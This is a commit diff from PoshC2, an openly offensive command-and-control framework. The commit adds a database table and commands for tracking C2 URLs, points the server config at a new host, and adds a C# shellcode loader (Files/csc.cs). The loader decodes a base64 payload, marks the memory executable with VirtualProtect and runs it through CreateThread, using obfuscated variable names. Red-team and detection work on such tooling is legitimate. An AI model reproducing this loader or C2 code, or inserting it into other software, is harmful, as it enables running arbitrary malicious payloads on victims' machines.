'Added List-URLs Command to DB'

nettitude · Oct 10, 2018 · a3d0b0c · a3d0b0c
1 parent 41917ef
commit a3d0b0c
Show file tree

Hide file tree

Showing 7 changed files with 219 additions and 125 deletions.
diff --git a/C2Server.py b/C2Server.py
@@ -283,6 +283,7 @@ def do_POST(s):
         C2[13], C2[11], "", "", C2[19], C2[20],
         C2[21], get_newimplanturl(), PayloadsDirectory)
 
+      new_urldetails( "default", C2[1], C2[3], "", "", "", "" )
       newPayload.CreateRaw()
       newPayload.CreateDlls()
       newPayload.CreateShellcode()

diff --git a/Config.py b/Config.py
@@ -4,8 +4,8 @@
 PORT_NUMBER = 443
 
 POSHDIR = "/opt/PoshC2_Python/" 
-ROOTDIR = "/opt/PoshC2-Project/" 
-HostnameIP = "https://172.16.0.126" 
+ROOTDIR = "/opt/PoshC2_Project/" 
+HostnameIP = "https://172.19.131.109" 
 ServerPort = "443"
 DomainFrontHeader = "" # example df.azureedge.net
 DefaultSleep = "5"
@@ -62,7 +62,7 @@
   |    |  (  <_> )___ \|   Y  \ \     \____/       \ 
   |____|   \____/____  >___|  /  \______  /\_______ \  
                      \/     \/          \/         \/
-  =============== v4.1 www.PoshC2.co.uk ============="""
+  =============== v4.2 www.PoshC2.co.uk ============="""
 
 # DO NOT CHANGE #
 

diff --git a/DB.py b/DB.py
@@ -42,6 +42,17 @@ def initializedb():
         RandomURI TEXT,
         Command TEXT);"""
 
+  create_urls = """CREATE TABLE URLs (
+        URLID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
+        RandomID TEXT,
+        URL TEXT,
+        HostHeader TEXT,        
+        ProxyURL TEXT,
+        ProxyUsername TEXT,
+        ProxyPassword TEXT,
+        CredentialExpiry TEXT
+        );"""
+
   create_creds = """CREATE TABLE Creds (
         credsID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
         Username TEXT,
@@ -88,6 +99,7 @@ def initializedb():
     c.execute(create_completedtasks)
     c.execute(create_tasks)
     c.execute(create_creds)
+    c.execute(create_urls)
     c.execute(create_c2server)
     c.execute(create_history)
     conn.commit()
@@ -134,6 +146,13 @@ def get_nettasks_all():
   else:
     return None
 
+def new_urldetails( RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry ):
+  conn = sqlite3.connect(DB)
+  conn.text_factory = str
+  c = conn.cursor()
+  c.execute("INSERT INTO URLs (RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry) VALUES (?, ?, ?, ?, ?, ?, ?)",(RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry))
+  conn.commit()
+
 def drop_nettasks():
   conn = sqlite3.connect(DB)
   conn.row_factory = sqlite3.Row
@@ -539,6 +558,17 @@ def get_hostinfo(randomuri):
   else:
     return None 
 
+def get_c2urls():
+  conn = sqlite3.connect(DB)
+  conn.row_factory = sqlite3.Row
+  c = conn.cursor()
+  c.execute("SELECT * FROM URLs")
+  result = c.fetchall()
+  if result:
+    return result
+  else:
+    return None 
+
 def get_autoruns():
   conn = sqlite3.connect(DB)
   conn.row_factory = sqlite3.Row

diff --git a/Files/csc.cs b/Files/csc.cs
@@ -0,0 +1,84 @@
+using System;
+using System.Reflection;
+using System.Diagnostics;
+using System.Configuration.Install;
+using System.Runtime.InteropServices;
+using System.Threading;
+
+class Program
+    {
+		[Flags()]
+        public enum AllocationType : uint
+        {
+            COMMIT = 0x1000,
+            RESERVE = 0x2000,
+            RESET = 0x80000,
+            LARGE_PAGES = 0x20000000,
+            PHYSICAL = 0x400000,
+            TOP_DOWN = 0x100000,
+            WRITE_WATCH = 0x200000
+        }
+
+        public enum Protection
+        {
+            PAGE_NOACCESS = 0x01,
+            PAGE_READONLY = 0x02,
+            PAGE_READWRITE = 0x04,
+            PAGE_WRITECOPY = 0x08,
+            PAGE_EXECUTE = 0x10,
+            PAGE_EXECUTE_READ = 0x20,
+            PAGE_EXECUTE_READWRITE = 0x40,
+            PAGE_EXECUTE_WRITECOPY = 0x80,
+            PAGE_GUARD = 0x100,
+            PAGE_NOCACHE = 0x200,
+            PAGE_WRITECOMBINE = 0x400
+        }
+
+        [DllImport("kernel32.dll", SetLastError=true)]
+        static extern IntPtr VirtualAlloc(IntPtr lpAddress, IntPtr dwSize, AllocationType flAllocationType, Protection flProtect);
+
+        [DllImport("Kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
+        static extern IntPtr CreateThread(
+                IntPtr lpThreadAttributes,
+                uint dwStackSize,
+                IntPtr lpStartAddress,
+                IntPtr lpParameter,
+                uint dwCreationFlags,
+                out uint lpThreadId);
+
+        [DllImport("kernel32.dll", SetLastError = true)]
+        static extern bool VirtualProtect(IntPtr lpAddress, IntPtr dwSize, Protection flNewProtect, out uint lpflOldProtect);
+
+        static void Main(string[] args)
+        {
+            byte[] shell = null;
+
+            string safdsv64 = "#REPLACEME64#";
+            string safdsv32 = "#REPLACEME32#";
+
+            if (IntPtr.Size == 4)
+            {
+                // 32-bit
+                shell = Convert.FromBase64String(safdsv32);
+            }
+            else if (IntPtr.Size == 8)
+            {
+                // 64-bit
+                shell = Convert.FromBase64String(safdsv64);
+            }
+
+            IntPtr mem = VirtualAlloc(IntPtr.Zero, (IntPtr)(shell.Length*2), AllocationType.COMMIT, Protection.PAGE_READWRITE);
+
+            if( mem != IntPtr.Zero )
+            {
+                uint oldProt = 0;
+                uint threadId = 0;
+                Marshal.Copy(shell, 0, mem, shell.Length);
+                VirtualProtect(mem, (IntPtr)(shell.Length * 2), Protection.PAGE_EXECUTE_READWRITE, out oldProt);
+                CreateThread(IntPtr.Zero, 0, mem, IntPtr.Zero, 0, out threadId);
+                WaitHandle wh = new EventWaitHandle(false, EventResetMode.ManualReset);
+                wh.WaitOne();
+            }
+        }
+
+}
diff --git a/Help.py b/Help.py
@@ -283,6 +283,8 @@
 =====================
 tasks
 opsec
+show-urls
+list-urls
 cleartasks
 show-serverinfo 
 history
@@ -305,7 +307,7 @@
 
 
 # pre help commands
-PRECOMMANDS = ['add-autorun' ,'list-autorun','del-autorun', 'nuke-autorun','automigrate-frompowershell',
+PRECOMMANDS = ['list-urls','show-urls', 'add-autorun' ,'list-autorun','del-autorun', 'nuke-autorun','automigrate-frompowershell',
 'show-serverinfo','history','output-to-html','set-clockworksmsapikey','set-clockworksmsnumber','set-defaultbeacon',
 'listmodules','pwnself','creds','createnewpayload','createproxypayload','listmodules',
 'createdaisypayload','turnoff-notifications','turnon-notifications','tasks','cleartasks',"opsec"]